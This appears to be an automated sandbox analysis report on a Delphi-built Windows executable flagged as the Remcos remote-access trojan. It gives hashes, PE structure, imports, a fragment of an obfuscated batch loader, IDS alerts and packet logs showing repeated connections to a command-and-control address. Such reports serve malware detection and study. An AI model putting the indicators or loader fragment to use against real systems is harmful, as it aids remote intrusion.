                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.0393696567543405
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.81%
                                      • Windows Screen Saver (13104/52) 0.13%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      File name:MeP66xi1AM.exe
                                      File size:952'320 bytes
                                      MD5:f8cdbdf8318c11c2e3e286195f067042
                                      SHA1:af9c826e25d7d9242c5957cf753af46dcb45fd33
                                      SHA256:b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5
                                      SHA512:cf30201667ebb76abb9adbed69afc2112385b6581449c496014a4c33328e7243531e13403384b3a9894be60c4029fa5de5a49133ea7465fc8e034b0c8cd3b74e
                                      SSDEEP:24576:R7sP5Kw0G1OAc8msbN0o2IDGHfPMFQJQI/zN:R8o9G1bTcfPMFQJQI/zN
                                      TLSH:99158E32E0606932DD15D5FC4CB2D6E85816BD323F37EC97FAB03D59AA39A446C29183
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                      File Icon

                                      Icon Hash:1f7effffffffff3f

                                      Static PE Info

                                      General

                                      Entrypoint:0x4637b4
                                      Entrypoint Section:.itext
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      DLL Characteristics:
                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:8e7f521f07f899da88391b86f035a0e3

                                      Entrypoint Preview

                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFF0h
                                      mov eax, 004621F0h
                                      call 00007F42950B04E1h
                                      mov eax, dword ptr [00465BF0h]
                                      mov eax, dword ptr [eax]
                                      call 00007F4295103BC9h
                                      mov ecx, dword ptr [00465CECh]
                                      mov eax, dword ptr [00465BF0h]
                                      mov eax, dword ptr [eax]
                                      mov edx, dword ptr [0046182Ch]
                                      call 00007F4295103BC9h
                                      mov eax, dword ptr [00465BF0h]
                                      mov eax, dword ptr [eax]
                                      call 00007F4295103C3Dh
                                      call 00007F42950AE25Ch
                                      lea eax, dword ptr [eax+00h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0000x2678.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x7b000.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6f0000x6dc8.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x6e0000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x6a7400x600.idata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x614280x616002161b7febbf1b940be5c4e4c60e97b79False0.5204463855905006data6.5251229505952315IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .itext0x630000x7fc0x800ffb4ea912e3359488468bf9aaca0fb82False0.6328125data6.217385141335654IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data0x640000x1d900x1e00232e22816e981f6fd08d561b5d49b914False0.400390625data3.8047431055440146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .bss0x660000x38740x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata0x6a0000x26780x28008d31ecdf7109ecf07a514ce35e6f1ebdFalse0.308984375data5.092633401959705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .tls0x6d0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata0x6e0000x180x200c3fa9ea58e8ba23d6c97449063988857False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x6f0000x6dc80x6e00b273c9477ef7ab10309b8aee3665c724False0.6352627840909091data6.678821577889799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .rsrc0x760000x7b0000x7b000a024c99cb615edc54506cf5d118121bfFalse0.4176809419461382data6.788468749924133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_CURSOR0x76b500x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                      RT_CURSOR0x76c840x134dataEnglishUnited States0.4642857142857143
                                      RT_CURSOR0x76db80x134dataEnglishUnited States0.4805194805194805
                                      RT_CURSOR0x76eec0x134dataEnglishUnited States0.38311688311688313
                                      RT_CURSOR0x770200x134dataEnglishUnited States0.36038961038961037
                                      RT_CURSOR0x771540x134dataEnglishUnited States0.4090909090909091
                                      RT_CURSOR0x772880x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                      RT_BITMAP0x773bc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                      RT_BITMAP0x7758c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                      RT_BITMAP0x777700x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                      RT_BITMAP0x779400x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                      RT_BITMAP0x77b100x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                      RT_BITMAP0x77ce00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                      RT_BITMAP0x77eb00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                      RT_BITMAP0x780800x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                      RT_BITMAP0x782500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                      RT_BITMAP0x784200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                      RT_BITMAP0x785f00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                      RT_ICON0x786d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.4228723404255319
                                      RT_ICON0x78b400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.29918032786885246
                                      RT_ICON0x794c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.2535178236397749
                                      RT_ICON0x7a5700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.18329875518672198
                                      RT_DIALOG0x7cb180x52data0.7682926829268293
                                      RT_DIALOG0x7cb6c0x52data0.7560975609756098
                                      RT_STRING0x7cbc00x178data0.4946808510638298
                                      RT_STRING0x7cd380x2d8data0.4684065934065934
                                      RT_STRING0x7d0100xb4data0.6888888888888889
                                      RT_STRING0x7d0c40xe8data0.6422413793103449
                                      RT_STRING0x7d1ac0x2a8data0.4764705882352941
                                      RT_STRING0x7d4540x3e8data0.382
                                      RT_STRING0x7d83c0x370data0.4022727272727273
                                      RT_STRING0x7dbac0x3ccdata0.33539094650205764
                                      RT_STRING0x7df780x214data0.49624060150375937
                                      RT_STRING0x7e18c0xccdata0.6274509803921569
                                      RT_STRING0x7e2580x194data0.5643564356435643
                                      RT_STRING0x7e3ec0x3c4data0.3288381742738589
                                      RT_STRING0x7e7b00x338data0.42961165048543687
                                      RT_STRING0x7eae80x294data0.42424242424242425
                                      RT_RCDATA0x7ed7c0x10data1.5
                                      RT_RCDATA0x7ed8c0x2ccdata0.729050279329609
                                      RT_RCDATA0x7f0580x719f4dataEnglishUnited States0.42970932281326013
                                      RT_RCDATA0xf0a4c0x4a0Delphi compiled form 'TForm1'0.47128378378378377
                                      RT_GROUP_CURSOR0xf0eec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                      RT_GROUP_CURSOR0xf0f000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                      RT_GROUP_CURSOR0xf0f140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                      RT_GROUP_CURSOR0xf0f280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                      RT_GROUP_CURSOR0xf0f3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                      RT_GROUP_CURSOR0xf0f500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                      RT_GROUP_CURSOR0xf0f640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                      RT_GROUP_ICON0xf0f780x3edata0.8709677419354839

                                      Imports

                                      DLLImport
                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                      user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                      kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                      user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                      kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                      oleaut32.dllGetErrorInfo, SysFreeString
                                      ole32.dllCoUninitialize, CoInitialize
                                      kernel32.dllSleep
                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                      comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-17T19:47:03.077202+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64970823.237.50.106443TCP
                                      2024-12-17T19:47:18.570061+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649710192.169.69.264610TCP
                                      2024-12-17T19:47:32.137548+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649742192.169.69.264610TCP
                                      2024-12-17T19:47:45.660104+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649776192.169.69.264610TCP
                                      2024-12-17T19:47:59.101670+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649808192.169.69.264610TCP
                                      2024-12-17T19:48:12.620564+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649841192.169.69.264610TCP
                                      2024-12-17T19:48:26.454189+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649874192.169.69.264610TCP
                                      2024-12-17T19:48:40.016570+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649907192.169.69.264610TCP
                                      2024-12-17T19:48:53.595546+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649939192.169.69.264610TCP
                                      2024-12-17T19:49:07.185091+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649972192.169.69.264610TCP
                                      2024-12-17T19:49:20.695746+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650004192.169.69.264610TCP
                                      2024-12-17T19:49:34.539024+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650007192.169.69.264610TCP
                                      2024-12-17T19:49:48.249996+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650009192.169.69.264610TCP
                                      2024-12-17T19:50:01.813406+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650011192.169.69.264610TCP
                                      2024-12-17T19:50:15.367649+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650013192.169.69.264610TCP
                                      2024-12-17T19:50:28.914990+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650015192.169.69.264610TCP
                                      2024-12-17T19:50:42.759117+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650017192.169.69.264610TCP
                                      2024-12-17T19:50:56.293614+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650019192.169.69.264610TCP
                                      2024-12-17T19:51:09.722195+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650022192.169.69.264610TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 17, 2024 19:47:01.239001989 CET49707443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:01.239075899 CET4434970723.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:01.239162922 CET49707443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:01.239902020 CET49707443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:01.239981890 CET4434970723.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:01.240107059 CET49707443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:01.263341904 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:01.263376951 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:01.263609886 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:01.267194986 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:01.267210007 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.077106953 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.077202082 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.080809116 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.080817938 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.081185102 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.130989075 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.200820923 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.243328094 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.587605953 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.587668896 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.587722063 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.587735891 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.611759901 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.611783981 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.611828089 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.611840963 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.611860037 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.657984972 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.754180908 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.754209042 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.754357100 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.754407883 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.754465103 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.903702974 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.903738022 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.903776884 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.903805971 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.903862953 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.994288921 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994314909 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994405985 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.994416952 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994453907 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994509935 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994515896 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.994524002 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994548082 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.994589090 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994646072 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.994651079 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994712114 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:03.994765043 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:03.994770050 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.017508030 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.017591000 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.017604113 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.057991982 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.115005016 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.115020990 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.115052938 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.115140915 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.115190983 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.136625051 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.136641026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.136694908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.136732101 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.136739016 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.149179935 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.149255991 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.149260998 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.149295092 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.149322033 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.166390896 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.166445017 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.166474104 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.166486025 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.166513920 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.178325891 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.178385019 CET4434970823.237.50.106192.168.2.6
